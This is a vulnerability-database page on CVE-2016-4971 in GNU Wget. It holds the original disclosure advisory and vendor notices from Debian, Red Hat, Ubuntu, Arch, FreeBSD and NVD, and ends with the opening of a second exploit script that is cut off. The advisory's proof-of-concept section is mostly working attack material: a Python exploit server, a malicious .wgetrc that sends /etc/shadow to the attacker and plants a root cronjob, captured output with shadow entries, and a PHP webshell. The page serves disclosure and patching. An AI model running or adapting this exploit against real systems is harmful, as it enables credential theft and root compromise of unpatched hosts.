INTRODUCTION\n-------------------------\n\nGNU Wget before 1.18 when supplied with a malicious URL (to a malicious or \ncompromised web server) can be tricked into saving an arbitrary remote file \nsupplied by an attacker, with arbitrary contents and filename under \nthe current directory and possibly other directories by writing to .wgetrc.\nDepending on the context in which wget is used, this can lead to remote code \nexecution and even root privilege escalation if wget is run via a root cronjob \nas is often the case in many web application deployments. \nThe vulnerability could also be exploited by well-positioned attackers within\nthe network who are able to intercept/modify the network traffic.\n\n\nIV. 
DESCRIPTION\n-------------------------\n\nBecause of lack of sufficient controls in wget, when a user downloads a file \nwith wget, such as:\n\nwget http://attackers-server/safe_file.txt\n\nan attacker who controls the server could make wget create an arbitrary file\nwith arbitrary contents and filename by issuing a crafted HTTP 30X Redirect \ncontaining an FTP server reference in response to the victim's wget request. \n\nFor example, if the attacker's server replies with the following response:\n\nHTTP/1.1 302 Found\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nLocation: ftp://attackers-server/.bash_profile\nContent-Length: 262\nServer: Apache\n\nwget will automatically follow the redirect and will download a malicious\n.bash_profile file from a malicious FTP server. \nIt will fail to rename the file to the originally requested filename of \n'safe_file.txt' as it would normally do, in case of a redirect to another \nHTTP resource with a different name. \n\nBecause of this vulnerability, an attacker is able to upload an arbitrary file\nwith an arbitrary filename to the victim's current directory.\n\nExecution flow:\n\nvictim@trusty:~$ wget --version | head -n1\nGNU Wget 1.17 built on linux-gnu.\n\nvictim@trusty:~$ pwd\n/home/victim\n\nvictim@trusty:~$ ls\nvictim@trusty:~$ \n\nvictim@trusty:~$ wget http://attackers-server/safe-file.txt\nResolving attackers-server... 192.168.57.1\nConnecting to attackers-server|192.168.57.1|:80... connected.\nHTTP request sent, awaiting response... 302 Found\nLocation: ftp://192.168.57.1/.bash_profile [following]\n => \u2018.bash_profile\u2019\nConnecting to 192.168.57.1:21... connected.\nLogging in as anonymous ... Logged in!\n==> SYST ... done. ==> PWD ... done.\n==> TYPE I ... done. ==> CWD not needed.\n==> SIZE .bash_profile ... 55\n==> PASV ... done. ==> RETR .bash_profile ... 
done.\nLength: 55 (unauthoritative)\n\n.bash_profile 100%[=============================================================================================>] 55 --.-KB/s in 0s\n\n2016-02-19 04:50:37 (1.27 MB/s) - \u2018.bash_profile\u2019 saved [55]\n\n\nvictim@trusty:~$ ls -l\ntotal 4\n-rw-rw-r-- 1 victim victim 55 Feb 19 04:50 .bash_profile\nvictim@trusty:~$ \n\n\nThis vulnerability will not work if extra options that force destination\nfilename are specified as a parameter. Such as: -O /tmp/output\nIt is however possible to exploit the issue with mirroring/recursive options\nenabled such as -r or -m.\n\nAnother limitation is that an attacker exploiting this vulnerability can only\nupload his malicious file to the current directory from which wget was run, \nor to a directory specified by -P option (directory_prefix option).\nThis could however be enough to exploit wget run from home directory, or\nwithin web document root (in which case attacker could write malicious php files\nor .bash_profile files).\n\nThe current directory limitation could also be bypassed by uploading a .wgetrc \nconfig file if wget was run from a home directory.\n\nBy saving .wgetrc in /home/victim/.wgetrc an attacker could set arbitrary wget\nsettings such as destination directory for all downloaded files in future,\nas well as set a proxy setting to make future requests go through a malicious \nproxy server belonging to the attackers to which they could send further \nmalicious responses.\n\n\nHere is a set of Wget settings that can be helpful to an attacker:\n\ndir_prefix = string\n\tTop of directory tree\u2014the same as \u2018-P string\u2019.\n\npost_file = file\n\tUse POST as the method for all HTTP requests and send the contents of file in the request body. 
The same as \u2018--post-file=file\u2019.\n\nrecursive = on/off\n\tRecursive on/off\u2014the same as \u2018-r\u2019.\n\ntimestamping = on/off\n\tAllows to overwrite existing files.\n\ncut_dirs = n\n\tIgnore n remote directory components. Allows attacker to create directories with wget (when combined with recursive option).\n\nhttp_proxy \n\tHTTP Proxy server\n\nhttps_proxy \n\tHTTPS Proxy server\n\noutput_document = file\n\tSet the output filename\u2014the same as \u2018-O file\u2019.\n\ninput = file\n\tRead the URLs from string, like \u2018-i file\u2019.\n\nmetalink-over-http\n\tIssues HTTP HEAD request instead of GET and extracts Metalink metadata from response headers. \n Then it switches to Metalink download. If no valid Metalink metadata is found, it falls back to ordinary HTTP download.\n\n\n\nFull list of .wgetrc options can be found in:\n\nhttps://www.gnu.org/software/wget/manual/wget.html#Wgetrc-Commands\n\n\n\nV. PROOF OF CONCEPT EXPLOIT\n-------------------------\n\n\n1) Cronjob with wget scenario\n\nOften wget is used inside cronjobs. By default cronjobs run within home \ndirectory of the cronjob owner.\nSuch wget cronjobs are commonly used with many applications used to download \nnew version of databases, requesting web scripts that perform scheduled tasks \nsuch as rebuilding indexes, cleaning caches etc. 
\nHere are a few example tutorials for Wordpress/Moodle/Joomla/Drupal found on \nthe Internet with exploitable wget cronjobs:\n\nhttps://codex.wordpress.org/Post_to_your_blog_using_email\nhttps://docs.moodle.org/2x/ca/Cron\nhttp://www.joomlablogger.net/joomla-tips/joomla-general-tips/how-to-set-up-a-content-delivery-network-cdn-for-your-joomla-site\nhttp://www.zyxware.com/articles/4483/drupal-how-to-add-a-cron-job-via-cpanel\n\nSuch setup could be abused by attackers to upload .bash_profile file through\nwget vulnerability and run commands in the context of the victim user upon \ntheir next log-in. \n\nAs cron runs periodically, attackers could also write out .wgetrc file in the \nfirst response and then write to /etc/cron.d/malicious-cron in the second. \nIf a cronjob is run by root, this would give them an almost instant root code \nexecution.\n\n\nIt is worth noting that if an attacker had access to local network they could \npotentially modify unencrypted HTTP traffic to inject malicious 30X Redirect \nresponses to wget requests.\n\nThis issue could also be exploited by attackers who have already gained \naccess to the server through a web vulnerability to escalate their privileges. 
\nIn many cases the cron jobs (as in examples above) are set up to request \nvarious web scripts e.g: \nhttp://localhost/clean-cache.php \n\nIf the file was writable by apache, and attacker had access to www-data/apache \naccount, they could modify it to return malicious Location header and exploit \nroot cronjob that runs the wget request in order to escalate their privileges \nto root.\n\n\nFor simplicity we can assume that attacker already has control over the server \nthat the victim sends the request to with wget.\n\nThe root cronjob on the victim server may look as follows:\n\nroot@victim:~# cat /etc/cron.d/update-database\n# Update database file every 2 minutes\n*/2 * * * * root wget -N http://attackers-server/database.db > /dev/null 2>&1\n\n\nIn order to exploit this setup, attacker first prepares a malicious .wgetrc \nand starts an FTP server:\n\nattackers-server# mkdir /tmp/ftptest\nattackers-server# cd /tmp/ftptest\n\nattackers-server# cat <<_EOF_>.wgetrc\npost_file = /etc/shadow\noutput_document = /etc/cron.d/wget-root-shell\n_EOF_\n\nattackers-server# sudo pip install pyftpdlib\nattackers-server# python -m pyftpdlib -p21 -w\n\n\nAt this point attacker can start an HTTP server which will exploit wget by\nsending malicious redirects to the victim wget's requests:\n \n---[ wget-exploit.py ]---\n\n#!/usr/bin/env python\n\n#\n# Wget 1.18 < Arbitrary File Upload Exploit\n# Dawid Golunski\n# dawid( at )legalhackers.com\n#\n# http://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\n#\n# CVE-2016-4971 \n#\n\nimport SimpleHTTPServer\nimport SocketServer\nimport socket;\n\nclass wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):\n def do_GET(self):\n # This takes care of sending .wgetrc\n\n print \"We have a volunteer requesting \" + self.path + \" by GET :)\\n\"\n if \"Wget\" not in self.headers.getheader('User-Agent'):\n\t print \"But it's not a Wget :( \\n\"\n self.send_response(200)\n self.end_headers()\n 
self.wfile.write(\"Nothing to see here...\")\n return\n\n print \"Uploading .wgetrc via ftp redirect vuln. It should land in /root \\n\"\n self.send_response(301)\n new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )\n print \"Sending redirect to %s \\n\"%(new_path)\n self.send_header('Location', new_path)\n self.end_headers()\n\n def do_POST(self):\n # In here we will receive extracted file and install a PoC cronjob\n\n print \"We have a volunteer requesting \" + self.path + \" by POST :)\\n\"\n if \"Wget\" not in self.headers.getheader('User-Agent'):\n\t print \"But it's not a Wget :( \\n\"\n self.send_response(200)\n self.end_headers()\n self.wfile.write(\"Nothing to see here...\")\n return\n\n content_len = int(self.headers.getheader('content-length', 0))\n post_body = self.rfile.read(content_len)\n print \"Received POST from wget, this should be the extracted /etc/shadow file: \\n\\n---[begin]---\\n %s \\n---[eof]---\\n\\n\" % (post_body)\n\n print \"Sending back a cronjob script as a thank-you for the file...\" \n print \"It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\"\n self.send_response(200)\n self.send_header('Content-type', 'text/plain')\n self.end_headers()\n self.wfile.write(ROOT_CRON)\n\n print \"\\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \\n\"\n\n return\n\nHTTP_LISTEN_IP = '192.168.57.1'\nHTTP_LISTEN_PORT = 80\nFTP_HOST = '192.168.57.1'\nFTP_PORT = 21\n\nROOT_CRON = \"* * * * * root /usr/bin/id > /root/hacked-via-wget \\n\"\n\nhandler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)\n\nprint \"Ready? Is your FTP server running?\"\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nresult = sock.connect_ex((FTP_HOST, FTP_PORT))\nif result == 0:\n print \"FTP found open on %s:%s. 
Let's go then\\n\" % (FTP_HOST, FTP_PORT)\nelse:\n print \"FTP is down :( Exiting.\"\n exit(1)\n\nprint \"Serving wget exploit on port %s...\\n\\n\" % HTTP_LISTEN_PORT\n\nhandler.serve_forever()\n\n\n---[ eof ]---\n\n\n\nAttacker can run wget-exploit.py and wait a few minutes until the victim's server executes\nthe aforementioned cronjob with wget.\n\nThe output should look similar to:\n\n\n---[ wget-exploit.py output ]---\n\nattackers-server# python ./wget-exploit.py \n\nReady? Is your FTP server running?\nFTP found open on 192.168.57.1:21. Let's go then\n\nServing wget exploit on port 80...\n\n\nWe have a volunteer requesting /database.db by GET :)\n\nUploading .wgetrc via ftp redirect vuln. It should land in /root \n\n192.168.57.10 - - [26/Feb/2016 15:03:54] \"GET /database.db HTTP/1.1\" 301 -\nSending redirect to ftp://anonymous@192.168.57.1:21/.wgetrc \n\nWe have a volunteer requesting /database.db by POST :)\n\nReceived POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\nroot:$6$FsAu5RlS$b2J9GDm.....cut......9P19Nb./Y75nypB4FXXzX/:16800:0:99999:7:::\ndaemon:*:16484:0:99999:7:::\nbin:*:16484:0:99999:7:::\nsys:*:16484:0:99999:7:::\nsync:*:16484:0:99999:7:::\ngames:*:16484:0:99999:7:::\nman:*:16484:0:99999:7:::\nlp:*:16484:0:99999:7:::\n...cut...\n---[eof]---\n\nSending back a cronjob script as a thank-you for the file...\nIt should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)\n192.168.57.10 - - [26/Feb/2016 15:05:54] \"POST /database.db HTTP/1.1\" 200 -\n\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n\n---[ output eof ]---\n\n\nAs we can see .wgetrc got uploaded by the exploit. 
It has set the post_file\nsetting to /etc/shadow.\nTherefore, on the next wget run, wget sent back the shadow file to the attacker.\nIt also saved the malicious cronjob script (ROOT_CRON variable) which should \ncreate a file named /root/hacked-via-wget, which we can verify on the victim's \nserver:\n\n\nroot@victim:~# cat /etc/cron.d/wget-root-shell \n* * * * * root /usr/bin/id > /root/hacked-via-wget \n\nroot@victim:~# cat /root/hacked-via-wget \nuid=0(root) gid=0(root) groups=0(root)\n\n\n\n2) PHP web application scenario\n\nIf wget is used within a PHP script e.g.:\n\n<?php\n\n// Update geoip data\n\n system(\"wget -N -P geoip http://attackers-host/goeip.db\");\t\n\n?>\n\nAn attacker who manages to respond to the request could simply upload a PHP\nbackdoor of:\n\n<?php\n\t//webshell.php\n\n\tsystem($_GET['cmd']);\n?>\n\nby using the wget-exploit script described in example 1.\n\nAfter the upload they could simply execute the script and their shell\ncommand by a GET request to:\n\nhttp://victims-php-host/geoip/webshell.php?cmd=id\n\n\nVI. BUSINESS IMPACT\n-------------------------\n\nAffected versions of wget that connect to untrusted (or compromised) web \nservers could be tricked into uploading a file under an arbitrary name, or\neven path (if wget is run from a home directory).\nDepending on the context in which wget is used, this could lead to\nuploading a web shell and granting the attacker remote access to the\nsystem, or privilege escalation. It could be possible for attackers to escalate\nto root user if wget is run via root cronjob as it is often the case in web \napplication deployments and is recommended in some guides on the Internet.\n\nThe vulnerability could also be exploited by well-positioned attackers within\nthe network who are able to intercept/modify the network traffic.\n\n \nVII. SYSTEMS AFFECTED\n-------------------------\n\nAll versions of Wget before the patched version of 1.18 are affected.\n \nVIII. 
SOLUTION\n-------------------------\n\nUpdate to wget version 1.18 as advertised by the vendor at:\n\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\n\nLinux distributions should update their wget packages. It is recommended\nto update wget manually if an updated package is not available for your\ndistribution.\n \nIX. REFERENCES\n-------------------------\n\nhttp://legalhackers.com\n\nhttp://legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt\n\nhttp://lists.gnu.org/archive/html/info-gnu/2016-06/msg00004.html\n\nhttp://www.ubuntu.com/usn/usn-3012-1/\n\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1343666#c1\n\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971\n\nX. CREDITS\n-------------------------\n\nThe vulnerability has been discovered by Dawid Golunski\ndawid (at) legalhackers (dot) com\nlegalhackers.com\n \nXI. REVISION HISTORY\n-------------------------\n\n06.07.2016 - Advisory released\n \nXII. LEGAL NOTICES\n-------------------------\n\nThe information contained within this advisory is supplied \"as-is\" with\nno warranties or guarantees of fitness of use or otherwise. 
I accept no\nresponsibility for any damage caused by the use or misuse of this information.", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nGiuseppe Scrivano reports:\n\nOn a server redirect from HTTP to a FTP resource, wget would trust the\n\t HTTP server and uses the name in the redirected URL as the destination\n\t filename.\n\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-09T00:00:00", "type": "freebsd", "title": "wget -- HTTP to FTP redirection file name confusion vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-09T00:00:00", "id": "6DF56C60-3738-11E6-A671-60A44CE6887B", "href": "https://vuxml.freebsd.org/freebsd/6df56c60-3738-11e6-a671-60a44ce6887b.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "debian": [{"lastseen": "2021-11-30T16:45:05", "description": "Package : wget\nVersion : 1.13.4-3+deb7u3\nCVE ID : CVE-2016-4971\nDebian Bug : 827003\n\nOn a server redirect from HTTP to a FTP resource, wget would trust\nthe HTTP server and uses the name 
in the redirected URL as the\ndestination filename.\nThis behaviour was changed and now it works similarly as a redirect\nfrom HTTP to another HTTP resource so the original name is used as\nthe destination file. To keep the previous behaviour the user must\nprovide --trust-server-names.\n\nFor Debian 7 \"Wheezy\", these problems have been fixed in version\n1.13.4-3+deb7u3.\n\nWe recommend that you upgrade your wget packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-30T20:12:28", "type": "debian", "title": "[SECURITY] [DLA 536-1] wget security update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-30T20:12:28", "id": "DEBIAN:DLA-536-1:51225", "href": "https://lists.debian.org/debian-lts-announce/2016/06/msg00037.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:41", "description": "GNU Wget when supplied with a malicious website 
link can be tricked\ninto saving an arbitrary remote file supplied by an attacker, with\narbitrary content and filename under the current directory. This can\nlead to potential code execution by creating system scripts (such as\n.bash_profile and others) within home directory as well as other\nunauthorized actions (such as request sniffing by proxy modification,\nor arbitrary system file retrieval) by uploading .wgetrc configuration\nfile.\nBecause of this vulnerability, an attacker is able to overwrite an\narbitrary file in the victim's current directory.", "edition": 2, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-20T00:00:00", "type": "archlinux", "title": "wget: arbitrary file overwrite", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-20T00:00:00", "id": "ASA-201606-19", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-June/000654.html", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "redhat": [{"lastseen": "2021-10-21T04:43:05", "description": "The wget packages provide the GNU Wget file retrieval utility for 
HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n* It was found that wget used a file name provided by the server for the downloaded file when following an HTTP redirect to a FTP server resource. This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client. (CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue. Upstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.3 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-11-03T06:07:15", "type": "redhat", "title": "(RHSA-2016:2587) Moderate: wget security and bug fix update", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2018-04-11T23:31:39", "id": "RHSA-2016:2587", "href": "https://access.redhat.com/errata/RHSA-2016:2587", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "debiancve": [{"lastseen": "2022-07-04T06:02:58", "description": 
"GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-30T17:59:00", "type": "debiancve", "title": "CVE-2016-4971", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-30T17:59:00", "id": "DEBIANCVE:CVE-2016-4971", "href": "https://security-tracker.debian.org/tracker/CVE-2016-4971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "ubuntu": [{"lastseen": "2023-01-26T13:22:34", "description": "## Releases\n\n * Ubuntu 16.04 ESM\n * Ubuntu 15.10 \n * Ubuntu 14.04 ESM\n * Ubuntu 12.04 \n\n## Packages\n\n * wget \\- retrieves files from the web\n\nDawid Golunski discovered that Wget incorrectly handled filenames when \nbeing redirected from an HTTP to an FTP URL. 
A malicious server could \npossibly use this issue to overwrite local files.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-20T00:00:00", "type": "ubuntu", "title": "Wget vulnerability", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-06-20T00:00:00", "id": "USN-3012-1", "href": "https://ubuntu.com/security/notices/USN-3012-1", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cve": [{"lastseen": "2023-02-02T23:31:46", "description": "It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. 
This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-06-30T17:59:00", "type": "cve", "title": "CVE-2016-4971", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2023-02-02T21:16:00", "cpe": ["cpe:/o:paloaltonetworks:pan-os:6.1.16", "cpe:/o:paloaltonetworks:pan-os:7.1.9", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:paloaltonetworks:pan-os:7.0.14", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:oracle:solaris:10", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:oracle:solaris:11.3"], "id": "CVE-2016-4971", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-4971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:oracle:solaris:10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*", "cpe:2.3:o:paloaltonetworks:pan-os:7.0.14:*:*:*:*:*:*:*", 
"cpe:2.3:o:oracle:solaris:11.3:*:*:*:*:*:*:*", "cpe:2.3:o:paloaltonetworks:pan-os:6.1.16:*:*:*:*:*:*:*", "cpe:2.3:o:paloaltonetworks:pan-os:7.1.9:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:-:*:*:*"]}], "exploitdb": [{"lastseen": "2022-08-16T06:05:03", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-30T00:00:00", "type": "exploitdb", "title": "GNU Wget < 1.18 - Arbitrary File Upload (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["2016-4971", "CVE-2016-4971"], "modified": "2021-04-30T00:00:00", "id": "EDB-ID:49815", "href": "https://www.exploit-db.com/exploits/49815", "sourceData": "# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)\r\n# Original Exploit Author: Dawid Golunski\r\n# Exploit Author: liewehacksie\r\n# Version: GNU Wget < 1.18 \r\n# CVE: CVE-2016-4971\r\n\r\nimport http.server\r\nimport socketserver\r\nimport socket\r\nimport sys\r\n\r\nclass wgetExploit(http.server.SimpleHTTPRequestHandler):\r\n\r\n def do_GET(self):\r\n # This takes care of sending 
